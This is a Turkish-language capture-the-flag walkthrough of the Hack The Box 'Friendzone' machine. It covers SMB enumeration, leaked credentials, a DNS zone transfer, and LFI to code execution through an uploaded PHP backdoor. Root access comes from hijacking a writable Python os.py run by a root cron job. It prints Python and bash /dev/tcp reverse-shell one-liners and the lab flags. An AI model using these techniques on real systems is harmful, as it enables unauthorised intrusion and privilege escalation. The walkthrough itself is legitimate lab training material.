| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Friendzone - HTB | Orta | Linux |  |
Walkthrough
nmap taraması:
ne yazıkki notlarıma almayı unutmuşum... Ancak hatırladığım kadrıyla smb 443 ve 53 açıktı.Kendime bir not smb gördükten sonra nmap ile script taramasıda atılmalı.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 15:00 EDT
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.071s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 18.13 secondsDaha sonrasında enum4linux ile devam edelim.
Starting smbmap scan
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
Bir creds.txt dosyası buldum.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# smbclient -W 'WORKGROUP' //'10.10.10.123'/'general' -U''%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6410736 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
53 açık olduğu için dns zone transfer denedim.
┌──(root💀kali)-[~]
└─# host -l "friendzone.red" 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1Bunları daha sonrasında /etc/hosts'ta ekleyip devam ettim. smb ile enum yaptığımda development'ın path'ini tespit etmiştik. Aynı zamanda :
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=<LFI> adresinde bir lfi tespit ettim. development pathine yazma hakkımız var lfi'ımız var. O zaman reverse alabiliriz.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# smbclient -W 'WORKGROUP' //'10.10.10.123'/'Development' -U''%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 31 16:14:31 2021
.. D 0 Wed Jan 23 16:51:02 2019
9221460 blocks of size 1024. 6460340 blocks available
smb: \> put simple-backdoor.php
putting file simple-backdoor.php as \simple-backdoor.php (1.5 kb/s) (average 1.5 kb/s)
smb: \> ls
. D 0 Tue Aug 31 16:15:29 2021
.. D 0 Wed Jan 23 16:51:02 2019
simple-backdoor.php A 328 Tue Aug 31 16:15:29 2021
9221460 blocks of size 1024. 6460336 blocks available
smb: \> https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/simple-backdooradresine gittiğimizde python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' payloadı ile reverse aldım.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# nc -lvp 1111
listening on [any] 1111 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 59346
www-data@FriendZone:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@FriendZone:/var/www/admin$ cd /home
cd /home
www-data@FriendZone:/home$ ls
ls
friend
www-data@FriendZone:/home$ cd friend
cd friend
www-data@FriendZone:/home/friend$ ls
ls
user.txt
www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
a9ed20acecd6c5b6b52f474e15ae9a11Bilgi toplama aşamasında yazabildiğimiz dosyalarda python kütüphanelerini gördüm.
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/Development
/etc/Development/simple-backdoor.php
/etc/sambafiles
/home/friend
/run/lock
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/result1
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory
/usr/lib/python2.7
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/var/lib/php/sessions
/var/mail/friend
/var/spool/samba
/var/tmp
./pspy32s ile bir ne oluyor diye dinledim.
friend@FriendZone:/tmp$ ./pspy32s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/09/01 00:23:43 CMD: UID=0 PID=98 |
2021/09/01 00:23:43 CMD: UID=0 PID=9 |
2021/09/01 00:23:43 CMD: UID=0 PID=89 |
2021/09/01 00:23:43 CMD: UID=107 PID=862 | /usr/sbin/exim4 -bd -q30m
2021/09/01 00:23:43 CMD: UID=0 PID=854 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=853 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=852 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=85 |
2021/09/01 00:23:43 CMD: UID=0 PID=82 |
2021/09/01 00:23:43 CMD: UID=0 PID=81 |
2021/09/01 00:23:43 CMD: UID=0 PID=80 |
2021/09/01 00:23:43 CMD: UID=0 PID=8 |
2021/09/01 00:23:43 CMD: UID=0 PID=79 |
2021/09/01 00:23:43 CMD: UID=0 PID=78 |
2021/09/01 00:23:43 CMD: UID=0 PID=77 |
2021/09/01 00:23:43 CMD: UID=0 PID=711 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=7 |
2021/09/01 00:23:43 CMD: UID=0 PID=6 |
2021/09/01 00:23:43 CMD: UID=0 PID=577 | /usr/sbin/nmbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=1000 PID=5498 | /usr/bin/gpg-agent --supervised
2021/09/01 00:23:43 CMD: UID=1000 PID=54384 | ./pspy32s
2021/09/01 00:23:43 CMD: UID=0 PID=54344 |
2021/09/01 00:23:43 CMD: UID=0 PID=54301 |
2021/09/01 00:23:43 CMD: UID=0 PID=54230 |
2021/09/01 00:23:43 CMD: UID=33 PID=488 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=487 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=486 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=485 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=484 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=0 PID=482 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=0 PID=478 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2021/09/01 00:23:43 CMD: UID=0 PID=469 | /usr/sbin/vsftpd /etc/vsftpd.conf
2021/09/01 00:23:43 CMD: UID=0 PID=465 | /usr/sbin/sshd -D
2021/09/01 00:23:43 CMD: UID=109 PID=458 | /usr/sbin/named -f -4 -u bind
2021/09/01 00:23:43 CMD: UID=0 PID=4 |
2021/09/01 00:23:43 CMD: UID=0 PID=397 | /usr/bin/VGAuthService
2021/09/01 00:23:43 CMD: UID=103 PID=391 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2021/09/01 00:23:43 CMD: UID=102 PID=390 | /usr/sbin/rsyslogd -n
2021/09/01 00:23:43 CMD: UID=0 PID=389 | /lib/systemd/systemd-logind
2021/09/01 00:23:43 CMD: UID=0 PID=383 | /usr/sbin/cron -f
2021/09/01 00:23:43 CMD: UID=0 PID=381 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2021/09/01 00:23:43 CMD: UID=0 PID=380 | /usr/lib/accountsservice/accounts-daemon
2021/09/01 00:23:43 CMD: UID=0 PID=35 |
2021/09/01 00:23:43 CMD: UID=62583 PID=346 | /lib/systemd/systemd-timesyncd
2021/09/01 00:23:43 CMD: UID=101 PID=345 | /lib/systemd/systemd-resolved
2021/09/01 00:23:43 CMD: UID=0 PID=34 |
2021/09/01 00:23:43 CMD: UID=0 PID=32 |
2021/09/01 00:23:43 CMD: UID=0 PID=30 |
2021/09/01 00:23:43 CMD: UID=0 PID=29 |
2021/09/01 00:23:43 CMD: UID=0 PID=28 |
2021/09/01 00:23:43 CMD: UID=0 PID=27 |
2021/09/01 00:23:43 CMD: UID=0 PID=26 |
2021/09/01 00:23:43 CMD: UID=100 PID=254 | /lib/systemd/systemd-networkd
2021/09/01 00:23:43 CMD: UID=0 PID=253 | /lib/systemd/systemd-udevd
2021/09/01 00:23:43 CMD: UID=0 PID=25 |
2021/09/01 00:23:43 CMD: UID=0 PID=24 |
2021/09/01 00:23:43 CMD: UID=0 PID=23 |
2021/09/01 00:23:43 CMD: UID=0 PID=228 | /usr/bin/vmtoolsd
2021/09/01 00:23:43 CMD: UID=0 PID=227 | /lib/systemd/systemd-journald
2021/09/01 00:23:43 CMD: UID=0 PID=22 |
2021/09/01 00:23:43 CMD: UID=0 PID=21 |
2021/09/01 00:23:43 CMD: UID=0 PID=20 |
2021/09/01 00:23:43 CMD: UID=0 PID=2 |
2021/09/01 00:23:43 CMD: UID=0 PID=196 |
2021/09/01 00:23:43 CMD: UID=0 PID=195 |
2021/09/01 00:23:43 CMD: UID=0 PID=19 |
2021/09/01 00:23:43 CMD: UID=0 PID=18 |
2021/09/01 00:23:43 CMD: UID=0 PID=174 |
2021/09/01 00:23:43 CMD: UID=0 PID=173 |
2021/09/01 00:23:43 CMD: UID=0 PID=172 |
2021/09/01 00:23:43 CMD: UID=0 PID=170 |
2021/09/01 00:23:43 CMD: UID=0 PID=17 |
2021/09/01 00:23:43 CMD: UID=0 PID=169 |
2021/09/01 00:23:43 CMD: UID=0 PID=168 |
2021/09/01 00:23:43 CMD: UID=0 PID=16 |
2021/09/01 00:23:43 CMD: UID=0 PID=15 |
2021/09/01 00:23:43 CMD: UID=0 PID=14 |
2021/09/01 00:23:43 CMD: UID=33 PID=1321 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=1000 PID=1301 | -bash
2021/09/01 00:23:43 CMD: UID=0 PID=13 |
2021/09/01 00:23:43 CMD: UID=1000 PID=1299 | sshd: friend@pts/1
2021/09/01 00:23:43 CMD: UID=0 PID=1273 | sshd: friend [priv]
2021/09/01 00:23:43 CMD: UID=1000 PID=1258 | bash
2021/09/01 00:23:43 CMD: UID=1000 PID=1248 | (sd-pam)
2021/09/01 00:23:43 CMD: UID=1000 PID=1247 | /lib/systemd/systemd --user
2021/09/01 00:23:43 CMD: UID=33 PID=1246 | su friend
2021/09/01 00:23:43 CMD: UID=33 PID=1223 | /bin/bash
2021/09/01 00:23:43 CMD: UID=33 PID=1222 | python -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")
2021/09/01 00:23:43 CMD: UID=33 PID=1221 | sh -c python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
2021/09/01 00:23:43 CMD: UID=33 PID=1206 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=0 PID=12 |
2021/09/01 00:23:43 CMD: UID=0 PID=1195 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=115 |
2021/09/01 00:23:43 CMD: UID=0 PID=11 |
2021/09/01 00:23:43 CMD: UID=0 PID=10 |
2021/09/01 00:23:43 CMD: UID=0 PID=1 | /sbin/init splash
2021/09/01 00:24:01 CMD: UID=0 PID=54394 | /usr/bin/python /opt/server_admin/reporter.py
2021/09/01 00:24:01 CMD: UID=0 PID=54393 | /bin/sh -c /opt/server_admin/reporter.py
2021/09/01 00:24:01 CMD: UID=0 PID=54392 | /usr/sbin/CRON -f
2021/09/01 00:24:01 CMD: UID=0 PID=54396 | bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54395 | sh -c bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54397 | bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54402 | /bin/sh /usr/bin/lesspipe
2021/09/01 00:24:01 CMD: UID=0 PID=54401 | /bin/sh /usr/bin/lesspipe
2021/09/01 00:24:01 CMD: UID=0 PID=54400 | bash -i
2021/09/01 00:24:01 CMD: UID=0 PID=54406 | dircolors -b
2021/09/01 00:24:01 CMD: UID=0 PID=54405 | bash -i 2021/09/01 00:24:01 CMD: UID=0 PID=54394 | /usr/bin/python /opt/server_admin/reporter.py Şimdi bu dosyayı manipüle edelim.
friend@FriendZone:/tmp$ cat shell.sh
bash -i >& /dev/tcp/10.10.14.4/1234 0>&1
friend@FriendZone:/tmp$ tail /usr/lib/python2.7/os.py
try:
_copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
_make_statvfs_result)
except NameError: # statvfs_result may not exist
pass
system("bash /tmp/shell.sh")
┌──(root💀kali)-[/opt]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 49692
bash: cannot set terminal process group (54393): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# cd /root
cd /root
root@FriendZone:~# ls
ls
certs
root.txt
root@FriendZone:~# cat root.txt
cat root.txt
b0e6c60b82cf96e9855ac1656a9e90c7
root@FriendZone:~#
İlk Yorumu Siz Yapın